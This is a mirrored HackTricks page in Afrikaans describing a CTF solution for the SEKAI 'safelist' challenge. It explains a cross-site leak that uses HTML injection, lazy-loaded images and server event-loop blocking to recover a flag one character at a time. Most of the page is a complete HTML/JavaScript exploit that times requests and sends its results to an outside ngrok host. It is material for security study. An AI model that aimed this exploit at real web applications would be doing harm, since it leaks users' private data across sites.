mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	
		
			
				
	
	
		
			155 lines
		
	
	
		
			4.9 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			155 lines
		
	
	
		
			4.9 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
| # Event Loop Blocking + Lazy images
 | |
| 
 | |
| {{#include ../../banners/hacktricks-training.md}}
 | |
| 
 | |
| In [**hierdie ontploffing**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) meng die **lazy image side channel** tegniek deur 'n HTML-inspuiting met 'n soort **event loop blocking technique** om karakters te lek.
 | |
| 
 | |
| Dit is 'n **verskillende ontploffing vir die CTF-uitdaging** wat reeds op die volgende bladsy kommentaar gelewer is. kyk na meer inligting oor die uitdaging:
 | |
| 
 | |
| {{#ref}}
 | |
| connection-pool-example.md
 | |
| {{#endref}}
 | |
| 
 | |
| Die idee agter hierdie ontploffing is:
 | |
| 
 | |
| - Die plasings word alfabeties gelaai
 | |
| - 'n **aanvaller** kan 'n **plasing** inspuit wat begin met **"A"**, dan sal 'n **HTML-tag** (soos 'n groot **`<canvas`**) die meeste van die **skerm** vul en 'n paar finale **`<img lazy` tags** om dinge te laai.
 | |
| - As die **aanvaller** in plaas van 'n "A" dieselfde plasing inspuit maar wat begin met 'n "z". Die **plasing** met die **vlag** sal **eerste** verskyn, dan sal die **ingespuite** **plasing** verskyn met die aanvanklike "z" en die **groot** **canvas**. Omdat die plasing met die vlag eerste verskyn het, sal die eerste canvas al die skerm beset en die finale **`<img lazy`** tags wat ingespuit is **nie gesien** word nie, so hulle **sal nie gelaai** word nie.
 | |
| - Dan, **terwyl** die bot die bladsy **toegang** het, sal die **aanvaller** **fetch versoeke stuur**.
 | |
| - As die **beelde** wat in die plasing ingespuit is **gelaai** word, sal hierdie **fetch** versoeke **langer** neem, so die aanvaller weet dat die **plasing voor die vlag** is (alfabeties).
 | |
| - As die **fetch** versoeke **vinning** is, beteken dit dat die **plasing** **alfabeties** **na** die vlag is.
 | |
| 
 | |
| Kom ons kyk na die kode:
 | |
| ```html
 | |
| <!DOCTYPE html>
 | |
| <html>
 | |
| <!--
 | |
| The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
 | |
| If images are loading, the request to "/" is slower, otherwise faster.
 | |
| By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
 | |
| We can use fetch to measure the request time.
 | |
| -->
 | |
| <body>
 | |
| <button onclick="run()">start</button>
 | |
| 
 | |
| <!-- Inject post with payload -->
 | |
| <form
 | |
| id="f"
 | |
| action="http://localhost:1234/create"
 | |
| method="POST"
 | |
| target="_blank">
 | |
| <input id="inp" name="text" value="" />
 | |
| </form>
 | |
| 
 | |
| <!-- Remove index -->
 | |
| <form
 | |
| id="f2"
 | |
| action="http://localhost:1234/remove"
 | |
| method="POST"
 | |
| target="_blank">
 | |
| <input id="inp2" name="index" value="" />
 | |
| </form>
 | |
| 
 | |
| <script>
 | |
| let flag = "SEKAI{"
 | |
| const TARGET = "https://safelist.ctf.sekai.team"
 | |
| f.action = TARGET + "/create"
 | |
| f2.action = TARGET + "/remove"
 | |
| 
 | |
| const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
 | |
| // Function to leak info to attacker
 | |
| const send = (data) => fetch("http://server.ngrok.io?d=" + data)
 | |
| const charset = "abcdefghijklmnopqrstuvwxyz".split("")
 | |
| 
 | |
| // start exploit
 | |
| let count = 0
 | |
| setTimeout(async () => {
 | |
| let L = 0
 | |
| let R = charset.length - 1
 | |
| 
 | |
| // I have omited code here as apparently it wasn't necesary
 | |
| 
 | |
| // fallback to linerar since I am not familiar with binary search lol
 | |
| for (let i = R; i >= L; i--) {
 | |
| let c = charset[i]
 | |
| send("try_" + flag + c)
 | |
| const found = await testChar(flag + c)
 | |
| if (found) {
 | |
| send("found: " + flag + c)
 | |
| flag += c
 | |
| break
 | |
| }
 | |
| }
 | |
| }, 0)
 | |
| 
 | |
| async function testChar(str) {
 | |
| return new Promise((resolve) => {
 | |
| /*
 | |
| For 3350, you need to test it on your local to get this number.
 | |
| The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
 | |
| If starts with "A", the image should be loaded because it's in the threshold.
 | |
| */
 | |
| // <canvas height="3350px"> is experimental and allow to show the injected
 | |
| // images when the post injected is the first one but to hide them when
 | |
| // the injected post is after the post with the flag
 | |
| inp.value =
 | |
| str +
 | |
| '<br><canvas height="3350px"></canvas><br>' +
 | |
| Array.from({ length: 20 })
 | |
| .map((_, i) => `<img loading=lazy src=/?${i}>`)
 | |
| .join("")
 | |
| f.submit()
 | |
| 
 | |
| setTimeout(() => {
 | |
| run(str, resolve)
 | |
| }, 500)
 | |
| })
 | |
| }
 | |
| 
 | |
| async function run(str, resolve) {
 | |
| // Open posts page 5 times
 | |
| for (let i = 1; i <= 5; i++) {
 | |
| window.open(TARGET)
 | |
| }
 | |
| 
 | |
| let t = 0
 | |
| const round = 30 //Lets time 30 requests
 | |
| setTimeout(async () => {
 | |
| // Send 30 requests and time each
 | |
| for (let i = 0; i < round; i++) {
 | |
| let s = performance.now()
 | |
| await fetch(TARGET + "/?test", {
 | |
| mode: "no-cors",
 | |
| }).catch((err) => 1)
 | |
| let end = performance.now()
 | |
| t += end - s
 | |
| console.log(end - s)
 | |
| }
 | |
| const avg = t / round
 | |
| // Send info about how much time it took
 | |
| send(str + "," + t + "," + "avg:" + avg)
 | |
| 
 | |
| /*
 | |
| I get this threshold(1000ms) by trying multiple times on remote admin bot
 | |
| for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
 | |
| */
 | |
| const isFound = t >= 1000
 | |
| if (isFound) {
 | |
| inp2.value = "0"
 | |
| } else {
 | |
| inp2.value = "1"
 | |
| }
 | |
| 
 | |
| // remember to delete the post to not break our leak oracle
 | |
| f2.submit()
 | |
| setTimeout(() => {
 | |
| resolve(isFound)
 | |
| }, 200)
 | |
| }, 200)
 | |
| }
 | |
| </script>
 | |
| </body>
 | |
| </html>
 | |
| ```
 | |
| {{#include ../../banners/hacktricks-training.md}}
 |